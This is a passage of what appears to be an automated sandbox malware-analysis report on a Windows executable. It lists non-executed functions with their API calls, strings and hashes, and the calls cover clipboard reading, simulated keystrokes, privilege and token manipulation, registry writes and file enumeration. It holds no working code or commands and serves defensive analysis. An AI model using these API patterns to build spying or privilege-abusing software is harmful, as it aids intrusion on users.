                                                      • Instruction ID: dfe2d2be701a7f5a8b4c1b9c9cf819e83af25732fd0d5c0db6b5d55527bec69b
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: F2E0E67494010DDFDB00EFB8D54969E7FF4EF04302F1005A5FD01D2280D6309D508A62

                                                      Non-executed Functions

                                                      Function 00AECDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00AECE50
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AECE91
                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00AECED6
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AECF00
                                                      • SendMessageW.USER32 ref: 00AECF29
                                                      • _wcsncpy.LIBCMT ref: 00AECFA1
                                                      • GetKeyState.USER32(00000011), ref: 00AECFC2
                                                      • GetKeyState.USER32(00000009), ref: 00AECFCF
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AECFE5
                                                      • GetKeyState.USER32(00000010), ref: 00AECFEF
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AED018
                                                      • SendMessageW.USER32 ref: 00AED03F
                                                      • SendMessageW.USER32(?,00001030,?,00AEB602), ref: 00AED145
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00AED15B
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00AED16E
                                                      • SetCapture.USER32(?), ref: 00AED177
                                                      • ClientToScreen.USER32(?,?), ref: 00AED1DC
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00AED1E9
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AED203
                                                      • ReleaseCapture.USER32 ref: 00AED20E
                                                      • GetCursorPos.USER32(?), ref: 00AED248
                                                      • ScreenToClient.USER32(?,?), ref: 00AED255
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AED2B1
                                                      • SendMessageW.USER32 ref: 00AED2DF
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AED31C
                                                      • SendMessageW.USER32 ref: 00AED34B
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00AED36C
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00AED37B
                                                      • GetCursorPos.USER32(?), ref: 00AED39B
                                                      • ScreenToClient.USER32(?,?), ref: 00AED3A8
                                                      • GetParent.USER32(?), ref: 00AED3C8
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AED431
                                                      • SendMessageW.USER32 ref: 00AED462
                                                      • ClientToScreen.USER32(?,?), ref: 00AED4C0
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AED4F0
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AED51A
                                                      • SendMessageW.USER32 ref: 00AED53D
                                                      • ClientToScreen.USER32(?,?), ref: 00AED58F
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00AED5C3
                                                        • Part of subcall function 00A625DB: GetWindowLongW.USER32(?,000000EB), ref: 00A625EC
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00AED65F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 3977979337-4164748364
                                                      • Opcode ID: a8a56736aa85869e6b9044fc7b02911c651e9310f1b74afbee2c30a04a4a074c
                                                      • Instruction ID: 9d1a8080ca2cf36dbffa818286f1582130f3eadf2dce7553458ab301d68cb678
                                                      • Opcode Fuzzy Hash: a8a56736aa85869e6b9044fc7b02911c651e9310f1b74afbee2c30a04a4a074c
                                                      • Instruction Fuzzy Hash: 1A429D302043C1AFD725CF69C888FAABBE5FF48324F14052DF6959B2A1D7319952CB92
                                                      Function 00AE804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00AE873F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: %d/%02d/%02d
                                                      • API String ID: 3850602802-328681919
                                                      • Opcode ID: 4d4d677b64a21773104f43bceebba17fa1fa7cfd79dcb8e3579f8e0d4f2a1ac2
                                                      • Instruction ID: c897e6d8859252a6be819f6d306520ec5bd2581f093550ea4e6616a82bbf3774
                                                      • Opcode Fuzzy Hash: 4d4d677b64a21773104f43bceebba17fa1fa7cfd79dcb8e3579f8e0d4f2a1ac2
                                                      • Instruction Fuzzy Hash: A412C371500284AFEB259F65CC89FAF7BB8EF45710F244169F919EA2E1DF788941CB10
                                                      Function 00A7710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_memset
                                                      • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                      • API String ID: 1357608183-1798697756
                                                      • Opcode ID: cf8f6579a3fc74993d7edad4e731a25193369b1ea1b862674e02aabff00f77e9
                                                      • Instruction ID: 84bd27c7b740550947999f913b0202eb92d86c0bd144ef7fbb413b95da8728fe
                                                      • Opcode Fuzzy Hash: cf8f6579a3fc74993d7edad4e731a25193369b1ea1b862674e02aabff00f77e9
                                                      • Instruction Fuzzy Hash: 1B938071A00215DFDF24CF98C891BEDB7B5FF48710F25816AE959AB282E7749E81CB40
                                                      Function 00A64A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32(00000000,?), ref: 00A64A3D
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A9DA8E
                                                      • IsIconic.USER32(?), ref: 00A9DA97
                                                      • ShowWindow.USER32(?,00000009), ref: 00A9DAA4
                                                      • SetForegroundWindow.USER32(?), ref: 00A9DAAE
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A9DAC4
                                                      • GetCurrentThreadId.KERNEL32 ref: 00A9DACB
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A9DAD7
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A9DAE8
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A9DAF0
                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00A9DAF8
                                                      • SetForegroundWindow.USER32(?), ref: 00A9DAFB
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9DB10
                                                      • keybd_event.USER32(00000012,00000000), ref: 00A9DB1B
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9DB25
                                                      • keybd_event.USER32(00000012,00000000), ref: 00A9DB2A
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9DB33
                                                      • keybd_event.USER32(00000012,00000000), ref: 00A9DB38
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9DB42
                                                      • keybd_event.USER32(00000012,00000000), ref: 00A9DB47
                                                      • SetForegroundWindow.USER32(?), ref: 00A9DB4A
                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 00A9DB71
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: 050f8384e5a3115feee2f476174c8476c93e89cbd24e6387c077d3b105c42b92
                                                      • Instruction ID: 9d961e568ab7c6e1821f29e3dddb54210a2f86e14bd75975477bf903cf7ec039
                                                      • Opcode Fuzzy Hash: 050f8384e5a3115feee2f476174c8476c93e89cbd24e6387c077d3b105c42b92
                                                      • Instruction Fuzzy Hash: 8E317571B40358BFEF20AFA19C89F7F3EACEB54B90F114025FA04EA1D0C6715951ABA0
                                                      Function 00AB8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00AB8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AB8D0D
                                                        • Part of subcall function 00AB8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AB8D3A
                                                        • Part of subcall function 00AB8CC3: GetLastError.KERNEL32 ref: 00AB8D47
                                                      • _memset.LIBCMT ref: 00AB889B
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00AB88ED
                                                      • CloseHandle.KERNEL32(?), ref: 00AB88FE
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AB8915
                                                      • GetProcessWindowStation.USER32 ref: 00AB892E
                                                      • SetProcessWindowStation.USER32(00000000), ref: 00AB8938
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AB8952
                                                        • Part of subcall function 00AB8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AB8851), ref: 00AB8728
                                                        • Part of subcall function 00AB8713: CloseHandle.KERNEL32(?,?,00AB8851), ref: 00AB873A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                      • String ID: $default$winsta0
                                                      • API String ID: 2063423040-1027155976
                                                      • Opcode ID: 8fc6d279149a5d7bfc7ad765ce19fd9cd94d612c9da1d7662074621e903f2d0d
                                                      • Instruction ID: dfaee198571cd85fc75ca093a497149dc8ca4f5d8b307ef1a790df9d614937ac
                                                      • Opcode Fuzzy Hash: 8fc6d279149a5d7bfc7ad765ce19fd9cd94d612c9da1d7662074621e903f2d0d
                                                      • Instruction Fuzzy Hash: C8816A71900249BFDF11DFA8DD85AEEBBBCEF04344F18416AF910A6162DB398E15DB60
                                                      Function 00AD425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenClipboard.USER32(00AEF910), ref: 00AD4284
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00AD4292
                                                      • GetClipboardData.USER32(0000000D), ref: 00AD429A
                                                      • CloseClipboard.USER32 ref: 00AD42A6
                                                      • GlobalLock.KERNEL32(00000000), ref: 00AD42C2
                                                      • CloseClipboard.USER32 ref: 00AD42CC
                                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00AD42E1
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00AD42EE
                                                      • GetClipboardData.USER32(00000001), ref: 00AD42F6
                                                      • GlobalLock.KERNEL32(00000000), ref: 00AD4303
                                                      • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00AD4337
                                                      • CloseClipboard.USER32 ref: 00AD4447
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                      • String ID:
                                                      • API String ID: 3222323430-0
                                                      • Opcode ID: 5d0451df4da7336dc6e8e04105e4098f73a450981ac4184d4f4f245564d27f33
                                                      • Instruction ID: ca5fa91c094156820cb300882967b210fcf23f33803325e8c18f80efae6b929a
                                                      • Opcode Fuzzy Hash: 5d0451df4da7336dc6e8e04105e4098f73a450981ac4184d4f4f245564d27f33
                                                      • Instruction Fuzzy Hash: 3E51AF71204342AFD701EFA0DD86FAF77B8EF88B00F00452AF596D62A1DB70D9058B62
                                                      Function 00ACC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00ACC9F8
                                                      • FindClose.KERNEL32(00000000), ref: 00ACCA4C
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ACCA71
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ACCA88
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00ACCAAF
                                                      • __swprintf.LIBCMT ref: 00ACCAFB
                                                      • __swprintf.LIBCMT ref: 00ACCB3E
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                      • __swprintf.LIBCMT ref: 00ACCB92
                                                        • Part of subcall function 00A838D8: __woutput_l.LIBCMT ref: 00A83931
                                                      • __swprintf.LIBCMT ref: 00ACCBE0
                                                        • Part of subcall function 00A838D8: __flsbuf.LIBCMT ref: 00A83953
                                                        • Part of subcall function 00A838D8: __flsbuf.LIBCMT ref: 00A8396B
                                                      • __swprintf.LIBCMT ref: 00ACCC2F
                                                      • __swprintf.LIBCMT ref: 00ACCC7E
                                                      • __swprintf.LIBCMT ref: 00ACCCCD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                      • API String ID: 3953360268-2428617273
                                                      • Opcode ID: 8b3c1a19a44529e27a65602f18fbc18f6bd04d49aa1c31df60a476c61c93619f
                                                      • Instruction ID: 31eda235d19cb54b299f78a1f362904b27de9cb69f34fdd883b8ffdc5e0f390b
                                                      • Opcode Fuzzy Hash: 8b3c1a19a44529e27a65602f18fbc18f6bd04d49aa1c31df60a476c61c93619f
                                                      • Instruction Fuzzy Hash: 0DA11DB2508344ABC710EBA4C995DAFB7FCEF94704F40491DF586C7191EA34DA09CB62
                                                      Function 00ACF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00ACF221
                                                      • _wcscmp.LIBCMT ref: 00ACF236
                                                      • _wcscmp.LIBCMT ref: 00ACF24D
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00ACF25F
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00ACF279
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00ACF291
                                                      • FindClose.KERNEL32(00000000), ref: 00ACF29C
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00ACF2B8
                                                      • _wcscmp.LIBCMT ref: 00ACF2DF
                                                      • _wcscmp.LIBCMT ref: 00ACF2F6
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ACF308
                                                      • SetCurrentDirectoryW.KERNEL32(00B1A5A0), ref: 00ACF326
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ACF330
                                                      • FindClose.KERNEL32(00000000), ref: 00ACF33D
                                                      • FindClose.KERNEL32(00000000), ref: 00ACF34F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1803514871-438819550
                                                      • Opcode ID: 0860407ba0b7e56752cbcd609449115ccdad3af1b3f957d5fd9d6f36a5d7e849
                                                      • Instruction ID: 7b6b5a00a495059180d8705c2cc0460a28bb11ceae1c4f77460671fc4f5df449
                                                      • Opcode Fuzzy Hash: 0860407ba0b7e56752cbcd609449115ccdad3af1b3f957d5fd9d6f36a5d7e849
                                                      • Instruction Fuzzy Hash: 8131C0765012497EDF10DBA4DC88FDE77ADEF48360F1141BAE920D71A0EB70DA458B54
                                                      Function 00AE0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AE0BDE
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00AEF910,00000000,?,00000000,?,?), ref: 00AE0C4C
                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00AE0C94
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00AE0D1D
                                                      • RegCloseKey.ADVAPI32(?), ref: 00AE103D
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AE104A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectCreateRegistryValue
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 536824911-966354055
                                                      • Opcode ID: 10fa57b41213ed53e86d7b8f4285e646b5162c9c49f97ac4fe30c51ba3539791
                                                      • Instruction ID: a8b694e2123c1af7dd61e17afab486ff364af589fc475e0bcd8092eafa04feaa
                                                      • Opcode Fuzzy Hash: 10fa57b41213ed53e86d7b8f4285e646b5162c9c49f97ac4fe30c51ba3539791
                                                      • Instruction Fuzzy Hash: 740247752006519FCB14EF25C995E2AB7F9FF88724F04885DF88A9B262CB74ED41CB81
                                                      Function 00ACF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00ACF37E
                                                      • _wcscmp.LIBCMT ref: 00ACF393
                                                      • _wcscmp.LIBCMT ref: 00ACF3AA
                                                        • Part of subcall function 00AC45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AC45DC
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00ACF3D9
                                                      • FindClose.KERNEL32(00000000), ref: 00ACF3E4
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00ACF400
                                                      • _wcscmp.LIBCMT ref: 00ACF427
                                                      • _wcscmp.LIBCMT ref: 00ACF43E
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ACF450
                                                      • SetCurrentDirectoryW.KERNEL32(00B1A5A0), ref: 00ACF46E
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ACF478
                                                      • FindClose.KERNEL32(00000000), ref: 00ACF485
                                                      • FindClose.KERNEL32(00000000), ref: 00ACF497
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 1824444939-438819550
                                                      • Opcode ID: ec80722321ac6d6b05cd441c3613ced115cc3b7a579588e4a9b14a339a3bee31
                                                      • Instruction ID: 611c2c28d18d68d8be1e7d02f6405994e01a9648ab23fe69220b09945c0e0d8b
                                                      • Opcode Fuzzy Hash: ec80722321ac6d6b05cd441c3613ced115cc3b7a579588e4a9b14a339a3bee31
                                                      • Instruction Fuzzy Hash: 3131C2725012596FCF14EBA4EC88FDE77AD9F49320F1141BAE820E61A0DB70DA85CB64
                                                      Function 00AB81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00AB874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AB8766
                                                        • Part of subcall function 00AB874A: GetLastError.KERNEL32(?,00AB822A,?,?,?), ref: 00AB8770
                                                        • Part of subcall function 00AB874A: GetProcessHeap.KERNEL32(00000008,?,?,00AB822A,?,?,?), ref: 00AB877F
                                                        • Part of subcall function 00AB874A: HeapAlloc.KERNEL32(00000000,?,00AB822A,?,?,?), ref: 00AB8786
                                                        • Part of subcall function 00AB874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AB879D
                                                        • Part of subcall function 00AB87E7: GetProcessHeap.KERNEL32(00000008,00AB8240,00000000,00000000,?,00AB8240,?), ref: 00AB87F3
                                                        • Part of subcall function 00AB87E7: HeapAlloc.KERNEL32(00000000,?,00AB8240,?), ref: 00AB87FA
                                                        • Part of subcall function 00AB87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AB8240,?), ref: 00AB880B
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AB825B
                                                      • _memset.LIBCMT ref: 00AB8270
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AB828F
                                                      • GetLengthSid.ADVAPI32(?), ref: 00AB82A0
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00AB82DD
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AB82F9
                                                      • GetLengthSid.ADVAPI32(?), ref: 00AB8316
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AB8325
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00AB832C
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AB834D
                                                      • CopySid.ADVAPI32(00000000), ref: 00AB8354
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AB8385
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AB83AB
